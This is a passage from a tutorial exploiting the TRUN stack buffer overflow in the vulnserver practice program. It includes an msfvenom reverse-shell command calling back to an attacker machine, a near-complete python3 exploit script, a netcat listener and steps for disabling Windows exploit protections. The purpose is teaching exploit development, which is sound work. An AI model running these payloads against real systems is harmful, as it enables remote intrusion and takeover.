If you remember the memory layout from the introduction now you may notice the abstraction that I made. If it were to be made precise then the `text` segment should indeed start at 0x00400000 instead of 0x00000000.
{% endhint %}

For the purpose of viewing the active `vulnserver`, its libraries and their addresses we can use a Windows Sysinternals tool called [`Process Explorer`](https://docs.microsoft.com/en-us/sysinternals/downloads/process-explorer). Below you can see a screenshot of that:

![Disabled protections on both the vulnserver.exe and the essfunc.dll](https://1971224599-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-Mhlz_oZ3oVPSWFmU_3o%2Fuploads%2Fr06UgZKma3iSbvhcHfbz%2Fvulnserver-no-protections.png?alt=media\&token=9010a0a6-2b13-4503-aaa6-a031166c615b)

In the bottom pane, that lists loaded libraries and details about the `vulnserver` process, we can see a column called ASLR. You'll notice that ASLR is not only disabled for the `.exe` itself but also for a `.dll` (**d**ynamic-**l**ink **l**ibrary) called `essfunc.dll` (it was part of the vulnserver download).

Most importantly though, we can see the *Image Base* addresses for these code regions. The `vulnserver.exe` does indeed reside at 0x00400000. Note that we can also write down the base address for the `essfunc.dll` (0x62500000) as it does equally serve as a pool of possible instructions for us to jump to with ASLR disabled.

{% hint style="success" %}
Knowing the base addresses of these code segments and knowing that they won't be randomized, we can search for instructions in these modules and get their virtual address by adding the instruction's offset within the loaded image to that base address.
{% endhint %}

To find a `JMP ESP` instruction in the `vulnserver.exe` we can't just simply search for a string because it's a binary file. It consists of the binary assembler commands for the CPU (amongst headers and other regions). Instead, one possible way of finding an instruction is to search for the corresponding opcode - the hexadecimal value of said instruction.

Using an [(online) assembler](https://defuse.ca/online-x86-assembler.htm#disassembly) or google we can quickly determine that the opcode for a `JMP ESP` instruction consists of the two bytes `0xFF 0xE4`. We can now use a simple hexeditor like [`hexinator`](https://hexinator.com/hexinator-windows) to open the `vulnserver.exe` and search for the byte sequence `FFE4`.
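If you prefer a script over a hex editor, the same search is a few lines of Python. This is a minimal sketch: `find_all` is my own helper, the sample bytes are made up, and the file name in the commented-out usage is a placeholder.

```python
JMP_ESP = b"\xff\xe4"  # opcode bytes of JMP ESP


def find_all(data: bytes, needle: bytes = JMP_ESP) -> list:
    """Return the offsets of every occurrence of needle in data."""
    offsets = []
    start = data.find(needle)
    while start != -1:
        offsets.append(start)
        start = data.find(needle, start + 1)
    return offsets


sample = b"\x90\x90\xff\xe4\x00\xff\xe4\xc3"
print([hex(offset) for offset in find_all(sample)])

# Usage on a real file:
# with open("vulnserver.exe", "rb") as handle:
#     print([hex(offset) for offset in find_all(handle.read())])
```

Keep in mind that the result is a list of *file* offsets, and that a plain byte search matches the sequence anywhere in the file, not only inside the code section.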

I'll save you a few seconds by telling you that you won't find any such sequence in the `vulnserver.exe` though. It just doesn't occur.

However, remember that we also have the `essfunc.dll` at our disposal. Opening it in our favorite hexeditor and searching for `FFE4` we get lucky.

![Finding a JMP ESP instruction in the essfunc.dll](https://1971224599-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-Mhlz_oZ3oVPSWFmU_3o%2Fuploads%2Fg3XQs6ExWBfh6ZU7Ui27%2Fhexview-of-dll.png?alt=media\&token=25a588e8-7095-4a15-9e9f-dd6b1ed7d915)

Great, we found nine possible `JMP ESP` instructions (marked yellow)! Feel free to choose any one of them - I'll continue with the first one. And just as a reminder, yes, there are tools that can do all that and more *for* you.

Now to find the offset of that instruction one could be tempted to use the 0x5af that's displayed in the bottom left corner of the screenshot. And indeed, that's the offset of the instruction in this entire `.dll` file but, as mentioned before, the `.exe` and `.dll` consist of more than *just* code.

I went ahead and also marked the actual beginning of the code section inside the `.dll` with blue. So the code starts at 0x400 meaning that a file offset of 0x5af turns into a code offset of 0x1af.

This might seem like pulling a random hex number out of a hat at first, but referencing the [PE headers](https://docs.microsoft.com/en-us/windows/win32/debug/pe-format) one more time and examining the actual headers of the `essfunc.dll` with [`dumpbin`](https://docs.microsoft.com/en-us/cpp/build/reference/dumpbin-reference?view=msvc-170) we can see that every byte is accounted for:

![Extracted header values of the essfunc.dll](https://1971224599-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-Mhlz_oZ3oVPSWFmU_3o%2Fuploads%2FI0xXpyVjabMGVAEZeRvC%2Fdll-headers.png?alt=media\&token=576cf6cf-3b94-4cf2-adea-fad3b27afb34)

Firstly, we can see the image base address that we already saw in the Process Explorer. This is the address at which the `dll` will be loaded. Secondly, we see the `base of code` being at an offset of 0x1000 - so the code section of the `dll` will start at 0x62501000 in memory. Finally, we also see the 0x400 (`size of headers`) that describes the offset at which the actual code starts inside the `dll` file.

Knowing these numbers we can continue to calculate the address at which the `JMP ESP` instruction is going to be in memory.

0x62500000 (base address) + 0x1000 (base of code) + 0x1AF (instruction offset in `.dll`) = **0x625011AF**.

{% hint style="success" %}
Finally, we successfully calculated a suitable return address to a `JMP ESP` instruction.

**0x625011AF**
{% endhint %}
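The arithmetic can be written down as a short sketch. It assumes what the headers suggest for this particular file: the code section is the first section, starts directly after the headers in the file (0x400) and is mapped at the `base of code` (0x1000). The function and parameter names are made up for illustration; a general solution would have to look up the section table instead.

```python
def file_offset_to_address(file_offset: int, image_base: int,
                           base_of_code: int, size_of_headers: int) -> int:
    """Translate a file offset inside the code section to a virtual address.

    Assumption: the code section directly follows the headers in the file
    and is mapped at image_base + base_of_code in memory.
    """
    offset_in_code = file_offset - size_of_headers
    return image_base + base_of_code + offset_in_code


jmp_esp_address = file_offset_to_address(
    file_offset=0x5AF,      # position of FF E4 in the essfunc.dll file
    image_base=0x62500000,  # image base of the essfunc.dll
    base_of_code=0x1000,    # where the code section is mapped
    size_of_headers=0x400,  # where the code section starts in the file
)
print(hex(jmp_esp_address))  # 0x625011af
```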

Just to reiterate, with that information our plan for exploitation now looks like this:

`TRUN .`**`<`***`padding to the length of 2012`***`><`***`0x625011AF`***`><`***`shellcode`***`>`**

### Determining Bad Characters

Before we can start looking at the shellcode we have to check for what's generally called "bad characters". In essence, bad characters are bytes that may malform our final payload on the target.

{% hint style="info" %}
Comparing to the *normal* tutorial again, this step usually requires a trial and error sequence of sending all bytes (ranging from 0x00 to 0xFF) with a script and then observing the memory on the target to spot any differences.
{% endhint %}

Once we can look into the code though, we can deduce the bad characters manually. For this we simply follow the input buffer that contains the bytes we sent.

```c
Result = recv(Client, RecvBuf, RecvBufLen, 0);
```

First the `vulnserver` receives at most 4096 (`RecvBufLen`) raw bytes from the `Client` socket and stores them in `RecvBuf` (a byte array). This includes all bytes ranging from 0x00 to 0xFF.

Focusing on the `TRUN` command, the next line that will deal with the `RecvBuf` is one we've already looked at during the chapter "Triggering the BOF":

```c
strncpy(TrunBuf, RecvBuf, 3000);
```

Up to 3000 bytes from `RecvBuf` are copied into `TrunBuf`. From the [manpage for `strncpy`](https://linux.die.net/man/3/strncpy) we get that this function

> copies the string pointed to by *src*, including the terminating null byte ('\0'), to the buffer pointed to by *dest*.

So every byte after the first `0x00` will be discarded by this function. Thus, we can't have a `0x00` inside our payload before the shellcode ends!

The next step is the call to `Function3` and the unsafe use of `strcpy` which has the same null byte behavior. Other than that there are no manipulations on the input buffer for the `TRUN` command.

We can therefore conclude that the only bad character for our buffer overflow is the null byte.
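To make the effect of the null byte tangible, here is a small sketch that models what a C string function such as `strcpy` treats as "the string": everything up to, but not including, the first null byte. The helper `c_string_view` and the shortened sample payloads are made up for illustration and are not part of the vulnserver.

```python
def c_string_view(data: bytes) -> bytes:
    """Return the part of `data` that a C string function would copy,
    not counting the terminating null byte itself."""
    return data.split(b"\x00", 1)[0]


clean = b"TRUN ." + b"A" * 8 + b"\xaf\x11\x50\x62"
broken = b"TRUN ." + b"A" * 8 + b"\x00\x11\x50\x62"

print(len(clean), len(c_string_view(clean)))    # 18 18
print(len(broken), len(c_string_view(broken)))  # 18 14
```

The second payload loses everything from the null byte onwards, which is exactly what would happen to any shellcode placed behind it.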

{% hint style="info" %}
Other commands on the vulnserver (such as `LTER`) are a bit more restrictive and will manipulate the incoming bytes. You can view an example [here](https://www.ins1gn1a.com/identifying-bad-characters). Feel free to cross check with the source code to see how the other bad characters come to exist.
{% endhint %}

It's important to note that the bad characters must also be taken into account when choosing a return address. If our return address included a 0x00, for example, we couldn't use it without ending our payload at that position. Luckily for us, 0x625011AF does not contain a null byte or we'd have to find a different address.
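Such a check on a candidate return address can be sketched in a few lines. The function name is made up, and the second address is only an arbitrary example of an address inside the image range of the `vulnserver.exe`.

```python
import struct


def bad_bytes_in_address(address: int, bad_chars: bytes = b"\x00") -> list[int]:
    """Return the bad byte values contained in a 32-bit address."""
    packed = struct.pack("<I", address)  # the 4 bytes as they appear in the payload
    return [byte for byte in packed if byte in bad_chars]


print(bad_bytes_in_address(0x625011AF))  # []
print(bad_bytes_in_address(0x00401234))  # [0]
```

Every address close to the image base 0x00400000 has 0x00 as its most significant byte, so with such a return address the payload would end right after it and the shellcode behind it would never be copied.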

### Generating Shellcode

Moving on to the next step of our exploit creation. We got an offset, we got a `JMP ESP` instruction and we determined the bad characters. What's left to do is to create the shellcode and integrate it into our payload.

{% hint style="info" %}
This is not a course on shellcode nor would I have the expertise to write on any of that in detail. So we'll only have a short look at how to create some before disassembling the first few instructions in the next chapter.
{% endhint %}

There are many ways to go about this part. We could google for common shellcode \[[1](https://shell-storm.org/shellcode/)]\[[2](https://packetstormsecurity.com/files/164131/Windows-x86-Reverse-TCP-Shellcode.html)]\[...] (at your own risk), actually learn exploit development and write our own \[[1](https://www.vividmachines.com/shellcode/shellcode.html)], or use a tool that does everything for us (how does that sound, *huh*?).

This is the moment where we'll blatantly copy what most tutorials demonstrate:

```bash
msfvenom -p windows/shell_reverse_tcp LHOST=10.0.2.15 LPORT=80 EXITFUNC=thread -b "\x00" -f py
```

Using `msfvenom` from the Metasploit framework we are generating a non-staged TCP reverse shell payload that will connect back to 10.0.2.15 (my Kali machine) on port 80. With `EXITFUNC=thread` we specify that the shellcode should exit by terminating only the thread it runs in rather than the whole process, so the application does not crash when the shell ends. Lastly, we specify our one bad character to be omitted during generation with `-b` and set the output format to python with `-f py`.

![Generating the shellcode with msfvenom](https://1971224599-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-Mhlz_oZ3oVPSWFmU_3o%2Fuploads%2FV0kxNQiRkZyhMsxQQksG%2Fshellcode-generation.png?alt=media\&token=13f9da96-90f9-4df4-b3cc-e857af9d99ac)

Once we've got the shellcode as a sequence of bytes (raw instructions that will spawn our reverse shell on the target system) we can copy it for our final exploit payload.

### Building a NOP Sled

As we're slowly approaching the final phase, there is one more thing to add to our payload that's often misrepresented in my opinion: the NOP sled. Simply speaking, the [NOP](https://c9x.me/x86/html/file_module_x86_id_217.html) or no-op instruction is an instruction that has no effect on anything other than the EIP register. The CPU executes it without doing anything and continues at the next address.

{% hint style="info" %}
A NOP sled is a concatenation of lots of NOP instructions. Once the CPU hits one it will continue to increase the EIP until a normal instruction occurs. Note that sometimes a NOP sled can also refer to a bunch of instructions that just keep the status quo - such as incrementing and then decrementing a register for example.
{% endhint %}

{% hint style="danger" %}
What's sometimes taught for the `vulnserver` and the `TRUN` command is that "*we must include a NOP sled because we don't know where the shellcode will be in memory*" or something similar. But as we found out previously, that's not the case. We know exactly where it'll be.
{% endhint %}

If you remember the chapter where we talked about different exploit variants, we drew return addresses that pointed directly into the stack. As I already stated back there, even when ASLR is disabled the stack address might not be entirely deterministic as it could slightly change from system to system or even from "with debugger attached" to "without debugger attached".

In order to defeat this uncertainty, one could then add a NOP sled on the stack before the shellcode and try to aim somewhere in the middle of that with the return address. Thus, as long as the EIP hit the NOP sled *somewhere* it would start to slide along the NOPs until executing the shellcode.

{% hint style="info" %}
If you'd like to see an example for that technique you can check out my write up on the Binex room from TryHackMe [here](https://ccat.gitbook.io/cyber-sec/thm-write-ups/binex#finding-a-return-address).
{% endhint %}

**Anyway**, since we're using the address of the `JMP ESP` we will land *exactly* at the first instruction of our shellcode. So there is no randomness involved. However, if we were to attempt exploitation without a NOP sled we'd still fail.

In order to understand why that is and how big of a NOP sled we need, we'll have to look at the first few instructions of the shellcode. Using an (online) disassembler we can investigate the first couple of bytes that `msfvenom` generated for us:

![Beginning of the disassembled shellcode that was generated previously](https://1971224599-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-Mhlz_oZ3oVPSWFmU_3o%2Fuploads%2FviDVpdLNutfMomdiNa7V%2Fshellcode-diasassembly.png?alt=media\&token=58b1b4c2-856e-4569-9769-62d84eb9818c)

Although yours might look slightly different, when `msfvenom` used the `shikata_ga_nai` encoder (default) the first few instructions will consist of something like:

```armasm
<some floating point operation>
FNSTENV [ESP-0xC]
```

{% hint style="info" %}
For a detailed explanation for these instructions you can consult [this great article](https://www.boozallen.com/insights/cyber/shellcode/shikata-ga-nai-encoder.html). Here I'll try to focus only on what's important for us.
{% endhint %}

Since shellcode can land anywhere in memory it cannot rely on any hardcoded addresses. Therefore, the first thing that this shellcode attempts to do is to get a reference to where it is located in memory. The technique of using `FNSTENV` for that purpose is described [here](https://armoredcode.com/blog/backflip-into-the-stack/) and [here](http://phrack.org/issues/62/7.html).

The [`FNSTENV`](https://www.felixcloutier.com/x86/fstenv:fnstenv) instruction basically stores the 28 bytes large floating point environment structure at the specified address. One field of that structure, located 12 bytes in, holds the address of the last executed floating point instruction, which is the one right before the `FNSTENV` in our shellcode. By storing the structure at the offset `ESP - 0xc` (dec: -12) it aligns on the stack in such a way that exactly this field is placed at the address the ESP currently points to. This way, the next `pop` instruction will load an address inside the shellcode into the specified register (`ebx` in our example).

Our `FNSTENV` instruction is placed 7 bytes (see the offset in the disassembly) after the address the ESP points to during runtime of our exploit. When it writes the structure, 12 bytes below the ESP and 16 more bytes starting from the ESP are overwritten, and those 16 bytes are the beginning of our own shellcode. To be precise, 7 bytes of already executed shellcode + 4 bytes of the `FNSTENV` instruction itself and then (16-7-4=) 5 bytes of shellcode that weren't executed yet.

And finally, this is the real reason for the necessary NOP sled. We must avoid the shellcode overwriting itself which we can achieve by prepending it with (at least) 5 NOP bytes.
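This calculation can be sketched as follows. It assumes that the ESP points to the first byte after the return address when the `JMP ESP` executes, that the instructions before the `FNSTENV` don't move the ESP, and that `FNSTENV` writes a 28 byte structure starting at `ESP - 0xC`. The function and parameter names are made up for illustration.

```python
ENV_SIZE = 28        # bytes written by FNSTENV in 32-bit protected mode
STORE_OFFSET = -0xC  # FNSTENV [ESP-0xC]: the write starts 12 bytes below ESP


def minimum_nop_sled(fnstenv_offset: int, fnstenv_length: int) -> int:
    """Smallest NOP sled that keeps not-yet-executed shellcode intact.

    fnstenv_offset: offset of FNSTENV from the start of the shellcode
    fnstenv_length: size of the FNSTENV instruction in bytes
    """
    # First byte above ESP that is NOT overwritten by the stored structure
    end_of_write = STORE_OFFSET + ENV_SIZE  # ESP + 16
    # Without a sled, the instruction after FNSTENV starts this far above ESP
    next_instruction = fnstenv_offset + fnstenv_length
    return max(0, end_of_write - next_instruction)


print(minimum_nop_sled(fnstenv_offset=7, fnstenv_length=4))  # 5
```

If your generated shellcode places the `FNSTENV` at a different offset, plugging in that offset gives the minimum sled length for your variant.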

{% hint style="info" %}
On a final note, you'll likely never make the effort of calculating the exact amount of necessary NOP bytes ever again if you can just use a generic 32-byte NOP sled.\
\
However, this chapter was to demonstrate that there is absolutely nothing mysterious or random about this buffer overflow. So next time someone tells you that you have to use a NOP sled "***because you have to***" - you now know a bit more.
{% endhint %}

### Exploiting the Target

Finally, we've made it all the way to the actual exploit writing. Up until now we didn't have to write a single line of code to understand how to exploit this particular buffer overflow.

{% hint style="info" %}
For this part I'm going to use `python3` but you can attempt to use any language that you feel comfortable with. [Some people even use PowerShell...](https://benheater.com/powershell-win-x86-stack-bof-dev/) (While I don't agree with some of the technical representations, the PowerShell solution *is* amazing.)
{% endhint %}

Basically, we just have to combine the different pieces that we collected throughout the chapters:

1. The buffer must start with `TRUN .`
2. After 2012 bytes we start overwriting the saved return instruction pointer (RIP), so we can create the necessary padding with: `b"TRUN ."` (6 bytes) + `b"A"*(2012-6)`
3. For the return address we chose 0x625011AF
4. Following the return address comes the NOP sled: `b"\x90"*5`
5. At the end comes the shellcode that we generated with `msfvenom`

{% hint style="info" %}
When using `python3` the `send` methods of a socket require a byte string. Thus, all strings will be prepended with a `b`. Alternatively, we could use `"string".encode('latin1')` for every string.
{% endhint %}

There is one final thing to note. We know that we must place the address `0x625011AF` on the stack. But as previously explained the values on the stack are stored in little endian format. So if we want to create the value `0x625011AF` we actually have to write the single bytes in reversed order to the stack. Therefore, to create that address on the stack we must write the bytes `0xAF 0x11 0x50 0x62`.
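Instead of reversing the bytes by hand, Python's `struct` module can do the conversion. A minimal sketch:

```python
import struct

# "<I" means: little endian, unsigned 32-bit integer
return_address = struct.pack("<I", 0x625011AF)

print(return_address.hex(" "))  # af 11 50 62
```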

Stitching all of what we've gathered together in a single script, we get the following.

```python
#!/usr/bin/env python3

# import socket library for connection to the server
import socket

# Shellcode created with msfvenom
buf  = b"\xb8\xdf\xf1\x63\x55\xda\xde\xd9\x74\x24\xf4\x5b\x31"
# CLIPPED FOR BREVITY
buf += b"\xaf\x67\x70\x1c\x77\x94\x08\x0d\x12\x9a\xbf\x2e\x37"
shellcode = buf

# Create a TCP socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

# Use the socket to connect to the target vulnserver
s.connect(('10.0.2.9',9999))

# Use the starting bytes "TRUN ." to trigger the call to Function3
trigger_command = b'TRUN .'

# Create a padding that will fill the assigned buffer and overwrite the EBP
padding = b'A'*(2012 - len(trigger_command)) 

# Little endian representation of the address to the JMP ESP instruction
# This will overwrite the return instruction pointer (which will be loaded
# into the EIP register)
overwrite_rip = b'\xAF\x11\x50\x62'

# A NOP sled to avoid the shellcode overwriting itself
nop_sled = b'\x90'*5

# Combine all the pieces to form the payload
payload = trigger_command + padding + overwrite_rip + nop_sled + shellcode

# Send the payload to the vulnserver (sendall keeps sending until
# every byte of the payload has been handed to the network stack)
s.sendall(payload)
```

And that's it, we're done. Let's test that exploit.

{% hint style="info" %}
A small reminder if you've been following along with a Windows 11 target. In order for this exploit to work, you must disable the **Mandatory ASLR** option under "App & browser control" > "Exploit protection settings" - restart the virtual machine and then also disable **Real-time protection** under "Virus & threat protection settings".
{% endhint %}

Open a simple netcat listener with `nc -nlvp 80` (binding to a port below 1024 usually requires root privileges), make the script executable with `chmod +x exploit.py` and finally run it.

![Triggering the reverse shell](https://1971224599-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-Mhlz_oZ3oVPSWFmU_3o%2Fuploads%2FZ2YfiIdQ4E0Tt3oEQ2xf%2Freverse-shell.png?alt=media\&token=cb7530a2-5f5e-4c24-a29a-a6a918ed614e)

{% hint style="success" %}
We successfully triggered the reverse shell.
{% endhint %}

## Final Notes

We've tried to trace the entire process all the way from locating the vulnerable entry point up to successfully spawning a reverse shell - writing and firing only a single exploit script.

It's pretty much obvious that this method quickly becomes very tedious and far more difficult once the target application gets more complex. Using the tools and methodologies shown in the more practical tutorials is definitely recommended and sufficient for most challenges you'll encounter in CTFs for example.

However, I hope that you were able to gain at least something out of *whatever this here ended up being* and do now have a deeper understanding of the basic buffer overflow. Or maybe you were just equally as curious and can now sleep a tiny bit better.

Either way, I'm gladly **taking feedback** on any of the above. You can find me over at TCM's Discord and drop me a message anytime (I trust that you can find me) - or if you'd rather be subtle feel free to smash one of those smiley faces.

#### Practical Buffer Overflow Introductions

If you want to follow a more practical and user friendly introduction - you can try one of these:

* [TheCyberMentor - Buffer Overflows Made Easy](https://www.youtube.com/watch?v=ncBblM920jw)
* [John Hammond - Basic Buffer Overflow](https://youtu.be/yJF0YPd8lDw)

#### Acknowledgements

Huge ***thanks*** to my proof-readers and @TCM Security for the great support.

{% embed url="<https://app.diagrams.net/>" %}
All diagrams were made with the free online platform diagrams.net.
{% endembed %}
